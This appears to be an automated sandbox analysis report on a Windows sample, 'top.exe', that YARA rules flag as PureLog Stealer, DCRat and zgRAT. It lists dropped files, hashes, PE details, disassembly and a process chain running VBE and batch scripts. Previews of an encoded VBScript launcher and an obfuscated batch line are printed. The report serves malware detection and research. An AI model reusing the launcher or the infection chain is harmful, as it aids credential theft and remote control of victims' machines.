                                                                Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):4608
                                                                Entropy (8bit):3.9865181398105993
                                                                Encrypted:false
                                                                SSDEEP:48:6iJXPt3uM7Jt8Bs3FJsdcV4MKe27ddZzPvqBHqOulajfqXSfbNtm:JPdPc+Vx9MRvkUcjRzNt
                                                                MD5:ECDC31DA9B91F3CD8967CFA9BCC8E614
                                                                SHA1:F3D0A5633E1A23339353EC3A498F771EE958628F
                                                                SHA-256:D4105FC4701699BF45D9985BEEDE54B0885E7CC6C9154908D897759572269B99
                                                                SHA-512:646A096558EE1F640BFC5C8FB14D8DF0EBCE2CF73229D4C19F634AAA420F27BC6788FC4ECDCADFA4B55AC5B88BDA8C087BC13A7D3D72A7A13DC5910470A5B0BD
                                                                Malicious:true
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):214
                                                                Entropy (8bit):5.734800503443447
                                                                Encrypted:false
                                                                SSDEEP:6:R79fkA3TL1f6nL+3IWVGrVybXvJbo2ddWG:RhkQTB+i3INruZdWG
                                                                MD5:4E7CB8A078E5B3A01513FB64FB6667DB
                                                                SHA1:C5158EF3401BB6E42AEB802BDF61840AF16BA0F6
                                                                SHA-256:7C5AC3CF1CC30C853FE5A379B560167827EA50925141A9F1B5FEB86F0531E813
                                                                SHA-512:8ECE0C21F5F77176968583E7A85C4E3E49934332E0194416576C7D6D0732040959A92D1F7F5DFC17E5341295A549E34C50071E7DAC1870156AA969112B8CAA24
                                                                Malicious:false
                                                                Preview:L3oAOdiIl49AxLPl4c1kCJFK8qkwOizznqmrWoaKD2ur4xek6Eck5ZKCydBi3w4DEJWHihPQBrhJZXPLL9zJFP4Ogk32m2RR8qmvaXCYzMiO2AnaN0W46u8zPHk8oWoJaQLsueuy6aU3rpWf7cowfWUNsxfSwEtdhYymy4ptFi7faEHkvEBMr2oD57A79bC2r1VS0trCx5q6Zzxnp4grDh
                                                                Process:C:\Users\user\Desktop\top.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2020864
                                                                Entropy (8bit):7.570829238606583
                                                                Encrypted:false
                                                                SSDEEP:49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
                                                                MD5:6B9554367A439D39A00A0DFF9A08B123
                                                                SHA1:E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
                                                                SHA-256:3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
                                                                SHA-512:72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, Author: Joe Security
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 63%
                                                                Process:C:\Users\user\Desktop\top.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):265
                                                                Entropy (8bit):5.899722432776321
                                                                Encrypted:false
                                                                SSDEEP:6:G5vwqK+NkLzWbHZERUrFnBaORbM5nCQKPgwv7q1YV0NKiY267:GAMCzWL6uhBaORbQCAwTeKiY2m
                                                                MD5:F8B56B683C6FAA5B9EB7F37F01AF8C29
                                                                SHA1:89E4357CCDE76FE35AA3CBAC952BB68D691AE9CD
                                                                SHA-256:BD73B65E256773C9CF879C504B7D426573587B5C7B03BEC2D6FCCFDDACCF1721
                                                                SHA-512:321B6A63D3DCA1E52A65A47AB3D3A83D0D7EE59B28F29274B128D9B7F5C49F2CFAAC4F70D3981EE55821CBBDC3234BF4D721CBE3F64A888250AC4C297EB9F768
                                                                Malicious:false
                                                                Preview:#@~^8AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v&T!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zhkwMW\bN..AMWV+MHGUbYWMU+DzzMjT("Dd+^wL}G%X:h"WV92OaA%j+VhrA:[!,"W6U?D;(OTh^;A;Sx2"ao5Z(R(lYrS~!BP6ls/nJU8AAA==^#~@.
                                                                Process:C:\Users\user\Desktop\top.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):103
                                                                Entropy (8bit):5.151829411850067
                                                                Encrypted:false
                                                                SSDEEP:3:y/EjCku1UQ9Ank/HaJI7HusoZskTMLMDd1cA6Fn:y/sCkueQBHaJI7ChTKCTxo
                                                                MD5:A1C6E7D957B0B22C92C7B314D10E894D
                                                                SHA1:0F20C6FA17A304E0A20947D6E6F368406A19FC25
                                                                SHA-256:BF06F59116A3066353FE51051B9701FB34DDA96E7B80F24D8E6FC6B18BD01723
                                                                SHA-512:20985DACBB86AC9862DA8483978B579C0CCDB3DFF4F23AEE019B006669FD1230A684B2BD12FB43AB489343AD7AFF1FD0A8228890135E1854F9E2A106B7514E02
                                                                Malicious:false
                                                                Preview:%rGyaZNUmEtX%%CLyLdoAqhPu%..%tueAuObSXED%"C:\msproviderBrokerMonitornet/WinPerfcommon.exe"%ngFteMeRCly%
                                                                Process:C:\Windows\System32\PING.EXE
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):502
                                                                Entropy (8bit):4.618657637432167
                                                                Encrypted:false
                                                                SSDEEP:12:PEUZw5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:sU8dUOAokItULVDv
                                                                MD5:A8873AD91E10B5BC98B84EBAC26A50A7
                                                                SHA1:91B23220CE75D2B3D119382E8ED49412EAF81884
                                                                SHA-256:603BAF93B0565F3BD7172A3E00C133974742955DCA2649E9466D50D320DA2CFE
                                                                SHA-512:DC1C3E9FB6372E6C5B5D63CA8707C434FD1D4EA4B10EEAE44034E44F71669E06A4A8A3095DA0C80A68D7FEE54179E30AA6D046F36041B36AF42566E71C2D090E
                                                                Malicious:false
                                                                Preview:..Pinging 888683 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.507728200101384
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:top.exe
                                                                File size:2'342'756 bytes
                                                                MD5:92d29106be881759ef6f045a3415137d
                                                                SHA1:9b307b4b98851c4325a1f2746c7827a0d14c7e36
                                                                SHA256:b1996319c3b0fafa04179dd7b7de47c74be2dc3dc0d6aa04030b645970e1a9b0
                                                                SHA512:43b526bd521ac72688dc7670c9c9ce323b39675620a0bf202d783906ac650fdc1bbefeb5876f97c5fcf525e6c5d39cc4b29ffd43acd4560baf0745126c5eec8e
                                                                SSDEEP:49152:IBJ+h0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2L:yQhbcmcfM/N1RSavoujWHk
                                                                TLSH:FBB5CF4675D24F32C3B09B354567423D6290DB213A16EF0B7A5F2996A807BF19B332B3
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                                Icon Hash:1515d4d4442f2d2d
                                                                Entrypoint:0x41f530
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:1
                                                                File Version Major:5
                                                                File Version Minor:1
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:1
                                                                Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                Instruction
                                                                call 00007F75A887D22Bh
                                                                jmp 00007F75A887CB3Dh
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                push ebp
                                                                mov ebp, esp
                                                                push esi
                                                                push dword ptr [ebp+08h]
                                                                mov esi, ecx
                                                                call 00007F75A886F987h
                                                                mov dword ptr [esi], 004356D0h
                                                                mov eax, esi
                                                                pop esi
                                                                pop ebp
                                                                retn 0004h
                                                                and dword ptr [ecx+04h], 00000000h
                                                                mov eax, ecx
                                                                and dword ptr [ecx+08h], 00000000h
                                                                mov dword ptr [ecx+04h], 004356D8h
                                                                mov dword ptr [ecx], 004356D0h
                                                                ret
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                push ebp
                                                                mov ebp, esp
                                                                push esi
                                                                mov esi, ecx
                                                                lea eax, dword ptr [esi+04h]
                                                                mov dword ptr [esi], 004356B8h
                                                                push eax
                                                                call 00007F75A887FFCFh
                                                                test byte ptr [ebp+08h], 00000001h
                                                                pop ecx
                                                                je 00007F75A887CCCCh
                                                                push 0000000Ch
                                                                push esi
                                                                call 00007F75A887C289h
                                                                pop ecx
                                                                pop ecx
                                                                mov eax, esi
                                                                pop esi
                                                                pop ebp
                                                                retn 0004h
                                                                push ebp
                                                                mov ebp, esp
                                                                sub esp, 0Ch
                                                                lea ecx, dword ptr [ebp-0Ch]
                                                                call 00007F75A886F902h
                                                                push 0043BEF0h
                                                                lea eax, dword ptr [ebp-0Ch]
                                                                push eax
                                                                call 00007F75A887FA89h
                                                                int3
                                                                push ebp
                                                                mov ebp, esp
                                                                sub esp, 0Ch
                                                                lea ecx, dword ptr [ebp-0Ch]
                                                                call 00007F75A887CC48h
                                                                push 0043C0F4h
                                                                lea eax, dword ptr [ebp-0Ch]
                                                                push eax
                                                                call 00007F75A887FA6Ch
                                                                int3
                                                                jmp 00007F75A8881507h
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                push 00422900h
                                                                push dword ptr fs:[00000000h]
                                                                Programming Language:
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken
English | United States
                                                                No network behavior found
                                                                Target ID:0
                                                                Start time:10:25:03
                                                                Start date:11/01/2025
                                                                Path:C:\Users\user\Desktop\top.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\top.exe"
                                                                Imagebase:0x450000
                                                                File size:2'342'756 bytes
                                                                MD5 hash:92D29106BE881759EF6F045A3415137D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2044302589.00000000065FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2045393819.0000000006F0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:10:25:03
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\msproviderBrokerMonitornet\qGDN1Ee4B98z7IBsvEaYenHfp3i4NGluh1QU7ALIT.vbe"
                                                                Imagebase:0xa70000
                                                                File size:147'456 bytes
                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:10:25:34
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\msproviderBrokerMonitornet\rS0XRrLecpgQD85mPzoGJptpB8S2GwiBTdu9z4xSSrCX90wlqwqwnpzpgY0I.bat" "
                                                                Imagebase:0x790000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:10:25:34
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:10:25:34
                                                                Start date:11/01/2025
                                                                Path:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\msproviderBrokerMonitornet/WinPerfcommon.exe"
                                                                Imagebase:0x6e0000
                                                                File size:2'020'864 bytes
                                                                MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000000.2354556207.00000000006E2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.2441510550.0000000012C8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exe, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 63%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:10
                                                                Start time:10:25:37
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline"
                                                                Imagebase:0x7ff6556f0000
                                                                File size:2'759'232 bytes
                                                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:10:25:37
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:10:25:38
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4FDD.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCAA8B5102F2134902BBA166DD4B5C8948.TMP"
                                                                Imagebase:0x7ff6f9d30000
                                                                File size:52'744 bytes
                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:13
                                                                Start time:10:25:38
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imeik232\imeik232.cmdline"
                                                                Imagebase:0x7ff6556f0000
                                                                File size:2'759'232 bytes
                                                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:14
                                                                Start time:10:25:38
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:15
                                                                Start time:10:25:38
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES520F.tmp" "c:\Windows\System32\CSCBE040DD0C77A40C69F3560F59F6749C9.TMP"
                                                                Imagebase:0x7ff6f9d30000
                                                                File size:52'744 bytes
